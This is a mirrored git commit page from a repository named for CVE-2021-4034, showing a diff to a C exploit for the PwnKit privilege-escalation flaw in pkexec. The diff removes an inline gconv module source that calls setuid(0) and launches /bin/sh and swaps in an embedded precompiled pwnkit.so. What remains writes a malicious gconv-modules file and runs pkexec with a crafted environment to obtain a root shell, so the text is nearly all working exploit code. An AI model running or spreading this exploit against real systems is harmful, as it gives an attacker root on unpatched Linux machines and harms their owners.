mirror of
https://github.com/arthepsy/CVE-2021-4034.git
synced 2025-06-30 23:11:13 +01:00
embed pwnkit.so (no gcc required anymore)
This commit is contained in:
parent
0e48795ab0
commit
d63e5435ff
3 changed files with 36 additions and 14 deletions
|
@ -6,26 +6,16 @@
|
|||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
char *shell =
|
||||
"#include <stdio.h>\n"
|
||||
"#include <stdlib.h>\n"
|
||||
"#include <unistd.h>\n\n"
|
||||
"void gconv() {}\n"
|
||||
"void gconv_init() {\n"
|
||||
" setuid(0); setgid(0);\n"
|
||||
" seteuid(0); setegid(0);\n"
|
||||
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
|
||||
" exit(0);\n"
|
||||
"}";
|
||||
#include "pwnkit.so.inc"
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
FILE *fp;
|
||||
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
|
||||
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
|
||||
fp = fopen("pwnkit/pwnkit.c", "w");
|
||||
fprintf(fp, "%s", shell);
|
||||
fp = fopen("pwnkit/pwnkit.so", "w+");
|
||||
if (!fp) exit(-1);
|
||||
fwrite(pwnkit_so, pwnkit_so_len, 1, fp);
|
||||
fclose(fp);
|
||||
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
|
||||
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
|
||||
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
|
||||
}
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue